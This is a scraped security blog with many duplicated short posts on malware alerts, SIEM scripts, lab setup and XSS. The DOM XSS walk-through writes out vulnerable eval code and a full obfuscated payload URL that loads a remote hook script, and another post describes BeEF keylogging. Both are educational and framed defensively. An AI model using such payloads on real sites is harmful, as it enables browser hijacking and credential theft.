I thought this blog by fin1te explaining XSS on Facebook via PNGs was a great read, and worth the time of anybody interested in the topic.
The attackers will continue to evolve to evade detection and the good guys like us better stay on top of our game if we hope to stop (or even just detect) this madness!
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Friday, January 29, 2016
Saturday, January 23, 2016
PUM.Optional.HomepageControl
Let's say you run Malwarebytes and get this alert.
PUM.Optional.HomepageControl, HKU\...\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),,[...]
PUM stands for Potentially Unwanted Modification. This doesn't mean it's necessarily malicious. In fact in most cases this particular alert is probably normal and expected. Especially for example if you work at a company that automatically sets your homepage to their website. The reason Malwarebytes alerts you is for awareness since there are some pieces of malware that purposely alter your home page , for example setting it to their malicious site, or changing your search engine, etc.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
PUM.Optional.HomepageControl, HKU\...\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),,[...]
PUM stands for Potentially Unwanted Modification. This doesn't mean it's necessarily malicious. In fact in most cases this particular alert is probably normal and expected. Especially for example if you work at a company that automatically sets your homepage to their website. The reason Malwarebytes alerts you is for awareness since there are some pieces of malware that purposely alter your home page , for example setting it to their malicious site, or changing your search engine, etc.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Hijack.ControlPanelStyle ForceClassicControlPanel
Let's say you run Malwarebytes and get this alert.
Hijack.ControlPanelStyle, HKU\...\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER|ForceClassicControlPanel, 1, , [...]
All by itself this is likely just a false positive since ForceClassicControlPanel simply is a true false (1,0) value that determines if you use the newer style Control Panel view or the Classic View. Now if this showed up with a bunch of other infections, then perhaps it could be related as this shows up with infections that force classic control panel thus making it harder to navigate around and remove the malware.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Hijack.ControlPanelStyle, HKU\...\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER|ForceClassicControlPanel, 1, , [...]
All by itself this is likely just a false positive since ForceClassicControlPanel simply is a true false (1,0) value that determines if you use the newer style Control Panel view or the Classic View. Now if this showed up with a bunch of other infections, then perhaps it could be related as this shows up with infections that force classic control panel thus making it harder to navigate around and remove the malware.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Scripting Website Screenshot Captures
cutycapt is a nice tool that can allow you to script or automate collecting screenshots of websites.
As an example, after you download or install cutycapt (or use an OS like Kali that already has it installed) then you type
cutycapt --url=http://neonprimetime.blogspot.com --out=neo.png
And boom you have a screenshot in a png file.
Now add this command to some python script for example and you could in theory grab screenshots of an entire website if needed.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
As an example, after you download or install cutycapt (or use an OS like Kali that already has it installed) then you type
cutycapt --url=http://neonprimetime.blogspot.com --out=neo.png
And boom you have a screenshot in a png file.
Now add this command to some python script for example and you could in theory grab screenshots of an entire website if needed.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Wednesday, January 20, 2016
Dridex 120205 Letter-response A3 2-2 Tim@plan4print.co.uk
Dridex email with VBA Macro Microsoft Word attachment seen this morning.
Attachment was 120205 Letter-response A3 2-2.doc
sender Tim Speed
Subject Emailing: 120205 Letter-response A3 2-2
callouts to hxxp://www.lassethoresen.com
dynamoo blogs a bit about it here
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Attachment was 120205 Letter-response A3 2-2.doc
sender Tim Speed
Subject Emailing: 120205 Letter-response A3 2-2
callouts to hxxp://www.lassethoresen.com
dynamoo blogs a bit about it here
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Tuesday, January 19, 2016
User-Agent: Python-urllib/2.7
If you've ever seen an HTTP request in your logs like this and wondered what they are
GET / HTTP/1.1
Accept-Encoding: identity
Host: www.mywebsite.com
Connection: close
User-Agent: Python-urllib/2.7
The most common explanation is, based on the user-agent, that somebody wrote a python script (or is using somebody else's) that is hitting your website. You can learn more about the urllib2 at this link. It states that "By default urllib2 identifies itself as Python-urllib/x.y" which is what you see here, that somebody has Python 2.7 installed and ran a command or script that utilized that library's default user-agent string when connecting.
Whether it's malicious or not is another story. It could be a security researcher just doing his thing and saving the world, or it could be a bad guy reconing or poking/prodding your site, or it could be some joe-blow script kiddie just grabbing somebody else's script and experimenting across the Internet.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
GET / HTTP/1.1
Accept-Encoding: identity
Host: www.mywebsite.com
Connection: close
User-Agent: Python-urllib/2.7
The most common explanation is, based on the user-agent, that somebody wrote a python script (or is using somebody else's) that is hitting your website. You can learn more about the urllib2 at this link. It states that "By default urllib2 identifies itself as Python-urllib/x.y" which is what you see here, that somebody has Python 2.7 installed and ran a command or script that utilized that library's default user-agent string when connecting.
Whether it's malicious or not is another story. It could be a security researcher just doing his thing and saving the world, or it could be a bad guy reconing or poking/prodding your site, or it could be some joe-blow script kiddie just grabbing somebody else's script and experimenting across the Internet.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Split Linux/Putty into 2 screens
Just wanted to share some linux 101 basics. Ever been in a linux/putty session and you Split Linux/Putty into 2 screens so you can to 2 tasks at a time?
As an example, in 1 screen you want to run some backups which are going to take a while, while in the other screen you want to do some actual work.
Type screen to start the screen program
Hit Ctrl-a then let go of those keys and hit upper case S to split the screen into 2
Hit Ctrl-a then let go of those keys and hit Tab to move your cursor to the 2nd screen
Hit Ctrl-a then let go of those keys and hit lowercase c to start a 2nd screen in that bottom window
Now you're free to Ctrl-a Tab back and forth between the 2 screens while doing 2 different tasks.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
As an example, in 1 screen you want to run some backups which are going to take a while, while in the other screen you want to do some actual work.
Type screen to start the screen program
Hit Ctrl-a then let go of those keys and hit upper case S to split the screen into 2
Hit Ctrl-a then let go of those keys and hit Tab to move your cursor to the 2nd screen
Hit Ctrl-a then let go of those keys and hit lowercase c to start a 2nd screen in that bottom window
Now you're free to Ctrl-a Tab back and forth between the 2 screens while doing 2 different tasks.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Palo Alto's Angler Exploit Kit Evasion Research
I thought this Palo Alto research was fascinating about Angle Exploit Kit Evasion. It showed how compromised websites purposely go dormant / quiet many times during the day and sometimes for many days to trick security researchers into thinking they were taken down/cleaned up. It showed that compromised websites filter IP addresses meaning the website may only serve the malicious content to certain countries, regions, targets, etc. It showed that payload URLs can change every 1/2 hour to hour. It also showed. It also shows how payload javascript also can change every 1/2 hour to hour.
The attackers will continue to evolve to evade detection and the good guys like us better stay on top of our game if we hope to stop (or even just detect) this madness!
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
The attackers will continue to evolve to evade detection and the good guys like us better stay on top of our game if we hope to stop (or even just detect) this madness!
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Qualys Scantronitor 2.0 - A Window into Scan Activity
If you use the Qualys tool for vulnerability scanning your environment, you may be familiar with the great tool created by Don Franke, Josh Stevens, and Pete Babcock that gives you what is tagged as a "A Window into Scan Activity". As the Qualys community post stated, "Scantronitor is a self-service utility that provides non-Qualys® users with views into historical, ongoing and planned vulnerability assessments. Scantronitor improves relationships between the security team and other business units by allowing the business units to understand when Qualys scans are performed without having to ask the security team, giving the business units better visibility into the impact of scans on their systems." They even created a nice presentation to give you the look and feel of the original tool.
Imagine the scenario where your server teams or application teams want to know when you last scanned their device, possibly to troubleshoot a system issue or outage they had. Or to look at what scans are currently running now to see if it's related to an Incident they are working on. Or they want to know when the next scan is scheduled so they can plan their maintenance window. With Scantronitor you can give them that quick and simple visibility.
Scantronitor was written in PHP under the MIT License, source code posted out stevensj's github account, and hooks into the Qualys API v1.0.
I recently updated the original tool from Qualys API v1.0 to the newer Qualys API v2.0. I posted the Qualys API v2.0 updated source code over at @neonprimetime github. It's nothing special, no major changes, I mostly just ripped out the API v1.0 calls and replaced them with API v2.0 calls. There are some additional security considerations, just like in the original, that you'll want to consider before utilizing it, like how to authenticate users, how to store the API and possibly your proxy credentials, etc. You can also read more about Qualys API v2.0 from their site here.
Hope you found this useful and once again a shout out to Don Franke, Josh Stevens, and Pete Babcock for the original content!
Download Scantronitor v2.0 source from @neonprimetime github.
Below are some screenshots from the updated version of scantronitor.
Scantronitor homepage header with Past, Present, and future menu options.
Past screen that allows users to enter IP address or hostname and see when it was last scanned.
Present screen which will show any currently running scans.
Future screen which will show any future scheduled scans.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Imagine the scenario where your server teams or application teams want to know when you last scanned their device, possibly to troubleshoot a system issue or outage they had. Or to look at what scans are currently running now to see if it's related to an Incident they are working on. Or they want to know when the next scan is scheduled so they can plan their maintenance window. With Scantronitor you can give them that quick and simple visibility.
Scantronitor was written in PHP under the MIT License, source code posted out stevensj's github account, and hooks into the Qualys API v1.0.
I recently updated the original tool from Qualys API v1.0 to the newer Qualys API v2.0. I posted the Qualys API v2.0 updated source code over at @neonprimetime github. It's nothing special, no major changes, I mostly just ripped out the API v1.0 calls and replaced them with API v2.0 calls. There are some additional security considerations, just like in the original, that you'll want to consider before utilizing it, like how to authenticate users, how to store the API and possibly your proxy credentials, etc. You can also read more about Qualys API v2.0 from their site here.
Hope you found this useful and once again a shout out to Don Franke, Josh Stevens, and Pete Babcock for the original content!
Download Scantronitor v2.0 source from @neonprimetime github.
Below are some screenshots from the updated version of scantronitor.
Scantronitor homepage header with Past, Present, and future menu options.
Past screen that allows users to enter IP address or hostname and see when it was last scanned.
Present screen which will show any currently running scans.
Future screen which will show any future scheduled scans.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Labels:
Don Franke,
Josh Stevens,
Pete Babcock,
Qualys,
Qualys API,
Scantronitor,
stevensj
Friday, January 15, 2016
QRadar SIEM API call for Offenses Assigned to User
If interested, I wrote a simple python script and saved it on github that queries the QRadar SIEM API for Offenses Assigned to a specific user. If you missed it, I just recently posted a 101 walk-through on how to get your api calls working. The script I wrote is just a variation of the default samples provided by IBM over at their github.
After you have the default sample api calls working, just download my pythong script for assigned_to.py and put it in the same folder. The run it as follows.
# Offenses Assigned to Myself
> offenses/assigned_to.py -u MYUSERID
id:128 [MYUSERID] SrcIP=66.66.220.109
id:127 [MYUSERID] SrcIP=172.16.17.2
id:126 [MYUSERID] DstIP=61.61.61.33
id:125 [MYUSERID] DstIP=61.61.61.57
id:124 [MYUSERID] DstIP=10.0.0.2
# Offenses Not assigned to anybody yet
> offenses/assigned_to.py -u UNASSIGNED
id:133 [ ] SrcIP=190.190.117.177
id:132 [ ] User =USER22
id:131 [ ] SrcIP=66.66.103.118
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
After you have the default sample api calls working, just download my pythong script for assigned_to.py and put it in the same folder. The run it as follows.
# Offenses Assigned to Myself
> offenses/assigned_to.py -u MYUSERID
id:128 [MYUSERID] SrcIP=66.66.220.109
id:127 [MYUSERID] SrcIP=172.16.17.2
id:126 [MYUSERID] DstIP=61.61.61.33
id:125 [MYUSERID] DstIP=61.61.61.57
id:124 [MYUSERID] DstIP=10.0.0.2
# Offenses Not assigned to anybody yet
> offenses/assigned_to.py -u UNASSIGNED
id:133 [ ] SrcIP=190.190.117.177
id:132 [ ] User =USER22
id:131 [ ] SrcIP=66.66.103.118
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- php injection ali.txt walk-thru
- php injection exfil walk-thru
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
QRadar SIEM API 101 Walk-Through
I thought I'd share how I got the QRadar API working.
I downloaded the sample API python modules (RestApiClient.py, SampleUtilities.py, etc.) from github
I downloaded the sample API script (01_GetOffenses.py) from github
I saved them all to the same folder.
I made sure I had python3 installed (not 2).
Then I had to download our console website PEM from the certificate like so and save it to the same folder.
Then I had to create an authorized service/token.
Then run the script via
python 01_GetOffenses.py
It will prompt you to enter your authorization token (from the authorized service screen above) and your certificate location (copy the full path to the .crt file). Once you hit enter, you have the choice to save this token and certificate information to a plaintext file for future use. But then the API call runs and boom you have a list of all offenses!
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
I downloaded the sample API python modules (RestApiClient.py, SampleUtilities.py, etc.) from github
I downloaded the sample API script (01_GetOffenses.py) from github
I saved them all to the same folder.
I made sure I had python3 installed (not 2).
Then I had to download our console website PEM from the certificate like so and save it to the same folder.
Then I had to create an authorized service/token.
Then run the script via
python 01_GetOffenses.py
It will prompt you to enter your authorization token (from the authorized service screen above) and your certificate location (copy the full path to the .crt file). Once you hit enter, you have the choice to save this token and certificate information to a plaintext file for future use. But then the API call runs and boom you have a list of all offenses!
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- php injection ali.txt walk-thru
- php injection exfil walk-thru
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Wednesday, January 13, 2016
Uptick in SEO SQL Injection Attacks
This state of the Internet advisory from Akamai about a continous uptick in SEO sql injection attacks was a really good read and falls directly in line with a recent article I wrote about what I called the PageRank botnet sql injection describing in detail one of these attacks.
I just find it fascinating how these things can spread and it gives you an idea of how poorly the Internet is doing with secure coding practices and patching of known vulnerabilities, because if we were doing well then attackers would have no reason to build such attacks, but in general we must be failing because these types of attacks continue to be prevelant and successful.
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
I just find it fascinating how these things can spread and it gives you an idea of how poorly the Internet is doing with secure coding practices and patching of known vulnerabilities, because if we were doing well then attackers would have no reason to build such attacks, but in general we must be failing because these types of attacks continue to be prevelant and successful.
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- php injection ali.txt walk-thru
- php injection exfil walk-thru
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Labels:
Akamai,
PageRank Botnet,
SEO,
SQL Injection,
SQLi
Article on Phishing eBay with XSS
This article on how to build an eBay Phishing site I found as a quick read and very informative. It walks through after finding an XSS flaw how to may a copy of the website with WebHTTrack, make the modifications necessary to steal credentials from the html form, and the final link you'd drop into your phishing email. Good article by @ret2libc
More evidence that XSS flaws are bad and you should fix them immediately if your website scanner finds one.
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
More evidence that XSS flaws are bad and you should fix them immediately if your website scanner finds one.
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- php injection ali.txt walk-thru
- php injection exfil walk-thru
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Tuesday, January 12, 2016
XSS Flaws lead to Keylogging,Webcams, & more
I've enjoyed talking about XSS many times on this blog. Today is another one of those days! We're going to bring it hopefully full circle this time. First just as a heads up I'm working in my VM environment with networking configured like this to have a Kali linux box with Apache Web Server and also with BeEF and a windows 7 box with chrome.
Let's say a developer wrote a vulnerable PHP user page on his goodsite.com with this line of code. It's vulnerable to XSS because it's just echoing the user-controlled input back to the screen. This can be really bad as we'll see in a minute.
echo sprintf("User: %s", $_GET['userid']);
Now an evil attacker may swoop in, discover this flaw, and try to get one of your users of the website to click on a link that looks like this
Notice the javascript that tries to load a hook.js file from an evil site. We'll get to what that is later. First you should know that by default Chrome and many modern browsers actually would've saved your life already. Chrome's XSS auditor would've caught this and silently blocked it. You can see this if you view source and find the red highlighted text.
But let's say I was running an older insecure browser, the vulnerability was actually somewhere else and Chrome didn't catch it, or I'm evil and know how to evade the XSS Auditor, or I simply disabled the xss auditor feature (don't do this) in chrome like below.
Then truly bad things will happen as you see below. The evil attacker got my end user to go to my goodsite, but per the Chromes developer tab (F12) I'm able to see that even though my good page loaded, in the background, something else more evil loaded. A hook.js file from evilsite.com which came from the XSS injection of the script src tag. In addition, notice that the hook.js isn't done yet. It's actually created persistence. It's now running over and over every few seconds. This looks bad.
Over on the BeEF console the attacker probably sees some log like this showing him that you've joined his party
And at his disposal he can do whatever he wants as long as your browser and plugin versions support it including evil stuff like enabling your webcam
Or if you happen to type in a password or credit card
He's going to see that as well
One thing I found really cool about BeEF is that you can view all the javascript code behind the scenes making these hooks, keylogging, etc. work is all write there for you to view.
So if you're like me and have a background in web development as a good guy, then you can figure out exactly what code some of the bad guys are taking advantage of.
And finally I'll harp on it again, if you're a web developer, hopefully this blog post gives you another good reason to take XSS flaws seriously for the sake of your end user.
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Let's say a developer wrote a vulnerable PHP user page on his goodsite.com with this line of code. It's vulnerable to XSS because it's just echoing the user-controlled input back to the screen. This can be really bad as we'll see in a minute.
echo sprintf("User: %s", $_GET['userid']);
Now an evil attacker may swoop in, discover this flaw, and try to get one of your users of the website to click on a link that looks like this
Notice the javascript that tries to load a hook.js file from an evil site. We'll get to what that is later. First you should know that by default Chrome and many modern browsers actually would've saved your life already. Chrome's XSS auditor would've caught this and silently blocked it. You can see this if you view source and find the red highlighted text.
But let's say I was running an older insecure browser, the vulnerability was actually somewhere else and Chrome didn't catch it, or I'm evil and know how to evade the XSS Auditor, or I simply disabled the xss auditor feature (don't do this) in chrome like below.
Then truly bad things will happen as you see below. The evil attacker got my end user to go to my goodsite, but per the Chromes developer tab (F12) I'm able to see that even though my good page loaded, in the background, something else more evil loaded. A hook.js file from evilsite.com which came from the XSS injection of the script src tag. In addition, notice that the hook.js isn't done yet. It's actually created persistence. It's now running over and over every few seconds. This looks bad.
Over on the BeEF console the attacker probably sees some log like this showing him that you've joined his party
And at his disposal he can do whatever he wants as long as your browser and plugin versions support it including evil stuff like enabling your webcam
Or if you happen to type in a password or credit card
He's going to see that as well
One thing I found really cool about BeEF is that you can view all the javascript code behind the scenes making these hooks, keylogging, etc. work is all write there for you to view.
So if you're like me and have a background in web development as a good guy, then you can figure out exactly what code some of the bad guys are taking advantage of.
And finally I'll harp on it again, if you're a web developer, hopefully this blog post gives you another good reason to take XSS flaws seriously for the sake of your end user.
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- php injection ali.txt walk-thru
- php injection exfil walk-thru
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Labels:
BeEF,
Chrome,
Hook,
Keylogger,
Keylogging,
PHP,
Webcam,
XSS,
XSS Auditor,
XSS Filter
Getting 2 Virtual Box VMs to Talk to Eachother
Let's say I wanted to run thru some security walk-through like BeEF for example, but I don't want to touch my host device, I want to do it with multiple VMs in virtual box.
One of the trickier things sometimes with VMs is getting Networking setup correctly so 2 of them can talk to eachother. Today I'll show you how to get your Kali Linux vm and your Windows 7 vm to talk to eachother in both directions. Here's one simple way to do it.
Step 1 - Setup a Global Network
a.) Go to File->Preferences
b.) Click the plus sign and Add a new network, give it a name, leave the rest as default
Step 2 - Set each VM to use the new Global Network
a.) For each VM, go to Settings -> Network
b.) Select the new Global Network you created (I called mine BeEf)
Step 3 - Validate they can connect
a.) For each VM, find out it's IP address that it was assigned (this is a private address that only other VMs in that new global network you created can see). You cannot access this IP from your host or from other unrelated VMs. In windows, find your IP address by typing ipconfig /all. In linux, find it by typing ifconfig.
b.) For each VM, go to the command line and try to ping the other, this should work
c1.) If desired, to complete your validation, in Windows start a web server your IIS Express. Then from Linux try to access it via browser via the IP address.
c2.) And if desired, to complete your validation, in Linux start a web server your BeEf ui. Then from Windows try to access it via browser via the IP address.
You should be done and have bi-directional communication so you're ready to start hooking browsers or doing whatever else you desire in your own little area.
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
One of the trickier things sometimes with VMs is getting Networking setup correctly so 2 of them can talk to eachother. Today I'll show you how to get your Kali Linux vm and your Windows 7 vm to talk to eachother in both directions. Here's one simple way to do it.
Step 1 - Setup a Global Network
a.) Go to File->Preferences
b.) Click the plus sign and Add a new network, give it a name, leave the rest as default
Step 2 - Set each VM to use the new Global Network
a.) For each VM, go to Settings -> Network
b.) Select the new Global Network you created (I called mine BeEf)
Step 3 - Validate they can connect
a.) For each VM, find out it's IP address that it was assigned (this is a private address that only other VMs in that new global network you created can see). You cannot access this IP from your host or from other unrelated VMs. In windows, find your IP address by typing ipconfig /all. In linux, find it by typing ifconfig.
b.) For each VM, go to the command line and try to ping the other, this should work
c1.) If desired, to complete your validation, in Windows start a web server your IIS Express. Then from Linux try to access it via browser via the IP address.
c2.) And if desired, to complete your validation, in Linux start a web server your BeEf ui. Then from Windows try to access it via browser via the IP address.
You should be done and have bi-directional communication so you're ready to start hooking browsers or doing whatever else you desire in your own little area.
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- php injection ali.txt walk-thru
- php injection exfil walk-thru
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Labels:
NAT,
NAT Network,
Oracle Virtual Box,
Virtual Box
Monday, January 4, 2016
DOM XSS 101 Walk-Through
DOM XSS 101 Walk-Thru
We've talked about XSS (Cross-Site Scripting) before on this blog. I thought it would be good to walk-through a form of XSS that we really haven't covered yet called DOM (Document Object Model) XSS. The prior discussions we've had about XSS have revolved more around Store and Reflected XSS. Stored XSS is where the XSS attack was stored server-side likely in a database table and is loaded over and over from the database every time any user goes to a particular page. Reflected XSS is where the browser sends an attack request to the web server, and the web server responds back (or reflects) that attack back to the end user. Both Stored and Reflected XSS involve server side communication, thus there is a chance if done correctly for the Server to sanitize or block the XSS attack prior to it ever hitting the user. Another type of XSS worth talking about is DOM XSS. This attack is purely client-side, the request likely never makes it to the server and thus the Server has no way of protecting the user against the attack. The only forms of protection would be proper coding by the developer or the browser itself detecting and blocking the attack. It is possible, depending on how the attack is performed, that the server might log the web request but by then it might be too late and the attack may have occurred already. But there are also methods or ways using the # character (hash/pound) for an attacker to even prevent these DOM attacks from even being logged to the server thus the attack may go completely unnoticed.
I pasted an example of some poorly written Javascript that is vulnerable to DOM XSS.
Let's say I have a website and a url that looks like this hxxp://myurl.com/domxsstest.html?userid=123456
And say I want to write some javascript that will log the userid to the chrome/firefox/ie developer console for general troubleshooting.
function logUserId(userid){
console.log('debug: userid found was \'' + userid + '\'');
}
And in order to pull that userid out of the url and log it, I wrote this perfectly legit and functioning javascript code.
var myurl = window.location.href;
var useridstartindex = myurl.indexOf("userid=") + 7;
var userid = myurl.substring(useridstartindex,myurl.length);
var calllogfunction = 'logUserId(' + userid.toString() + ')'
eval(calllogfunction);
Since the above javascript uses the unsafe eval function and does not properly sanitize the user input (the Query string parameter 'userid'), an attacker could do the following to exploit this vulnerable code.
First to understand the concept, basically the attacker can control the value of the calllogfunction variable and can inject his own code into it that will execute against the browser and run in the origin/scope of the domain it's on (such as myurl.com). This can be very bad and can lead to malware, keystroke logging, drive-by downloads, credential theft, internal network recon, and much more.
At a super high level, we'd expect the calllogfunction variable to end up containing this
logUserId(12345)
But in my example below, as the attacker I am able to change the value of the calllogfunction variable to something such as below where I completely control 'my evil code'
logUserId(12345);eval('my evil code')
As a more realistic example I'm going to make it look like this.
logUserId(12345);eval(s=document.createElement('script'); s.src='http://neonprimetime.blogspot.com/fakehook.js'; document.getElementsByTagName('head')[0].appendChild(s))
If we quickly run through this code, here's what it does
logUserId(12345);
The above line logs the userid as the developer desired.
eval(s=document.createElement('script');
The above line then creates a new script tag which is where the attacker will insert his javascript code.
s.src='http://neonprimetime.blogspot.com/fakehook.js';
The above line then sets the source of the javascript code to his evil website hook script which does the bad things like installing malware, keylogging, or whatever is desired.
document.getElementsByTagName('head')[0].appendChild(s)
The above line finally searches for the head tag in the html page and appends the attackers script tag right after it dynamically. So just like that, which a few strokes of magic javascript code, the attackers evil javascript (hosted at neonprimetime.blogspot.com) is now running inside the user's browser under the origin/scope of the good site myurl.com.
So now to make this attack work, we simply need to adjust our url and get the victim user to click our adjusted url.
The first thing the attacker would do is take the evil code above (s=document.createElement........), drop it into a free utility like this one that converts the evil string code to integer character codes such as these ( 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 110, 101, 111, 110, 112, 114, 105, 109, 101, 116, 105, 109, 101, 46, 98, 108, 111, 103, 115, 112, 111, 116, 46, 99, 111, 109, 47, 102, 97, 107, 101, 104, 111, 111, 107, 46, 106, 115, 39, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59 )
This is done for probably at least 2 reasons, 1 is to avoid issues where a closing tick mark like this ' will terminate the original eval javascript statement. If that tick mark terminates the statement, then our attacker code won't get executed. The 2nd reason is more for obfuscation. This makes it harder for a WAF (web application firewall) or other tools to detect and block evil code since the obfuscated combinations options are literally endless.
We then add a call to the powerful Javascript function String.fromCharCode() which works the magic of converting our integers back into the evil code to execute. Thus we'd end up changing this hxxp://myurl.com/domxsstest.html?userid=123456 to something uglier like this hxxp://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,110,101,111,110,112,114,105,109,101,116,105,109,101,46,98,108,111,103,115,112,111,116,46,99,111,109,47,102,97,107,101,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))//
Then you throw this link into a phishing email or submit it to a message board or via social media messaging and get somebody to click on it. They're more likely to click on a link like this because even if they hover over the link and manually review it with their eyes prior to clicking, they'll see that the url is coming directly from their trusted url (myurl.com) so they'll be satisfied and click. But once they click, they're hooked, they're infected, and the bad guy has what he wants, control over that browser.
You can test out the code from the pastebin link above locally and watch as we discussed that the console will get logged the userid just as expected
But also in the background (end user would never even know) the javascript hook file was loaded from the 2nd domain.
OWASP, as usual, has a great link describing how to prevent attacks like this. You could also add HTTP Headers like Content-Security-Policy to restrict which domains scripts can evel be loaded from ,thus preventing the evil attackers javascript from even being loaded by the browser even if you are vulnerable to DOM XSS. This blog is a good quick read about those headers.
Hope this helps and remember to never underestimate an XSS vulnerability. If one shows up on your website, get your developers to fix it ASAP.
Credit goes to the Browser Hacker's Handbook for giving me the initial intro.
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
We've talked about XSS (Cross-Site Scripting) before on this blog. I thought it would be good to walk-through a form of XSS that we really haven't covered yet called DOM (Document Object Model) XSS. The prior discussions we've had about XSS have revolved more around Store and Reflected XSS. Stored XSS is where the XSS attack was stored server-side likely in a database table and is loaded over and over from the database every time any user goes to a particular page. Reflected XSS is where the browser sends an attack request to the web server, and the web server responds back (or reflects) that attack back to the end user. Both Stored and Reflected XSS involve server side communication, thus there is a chance if done correctly for the Server to sanitize or block the XSS attack prior to it ever hitting the user. Another type of XSS worth talking about is DOM XSS. This attack is purely client-side, the request likely never makes it to the server and thus the Server has no way of protecting the user against the attack. The only forms of protection would be proper coding by the developer or the browser itself detecting and blocking the attack. It is possible, depending on how the attack is performed, that the server might log the web request but by then it might be too late and the attack may have occurred already. But there are also methods or ways using the # character (hash/pound) for an attacker to even prevent these DOM attacks from even being logged to the server thus the attack may go completely unnoticed.
I pasted an example of some poorly written Javascript that is vulnerable to DOM XSS.
Let's say I have a website and a url that looks like this hxxp://myurl.com/domxsstest.html?userid=123456
And say I want to write some javascript that will log the userid to the chrome/firefox/ie developer console for general troubleshooting.
function logUserId(userid){
console.log('debug: userid found was \'' + userid + '\'');
}
And in order to pull that userid out of the url and log it, I wrote this perfectly legit and functioning javascript code.
var myurl = window.location.href;
var useridstartindex = myurl.indexOf("userid=") + 7;
var userid = myurl.substring(useridstartindex,myurl.length);
var calllogfunction = 'logUserId(' + userid.toString() + ')'
eval(calllogfunction);
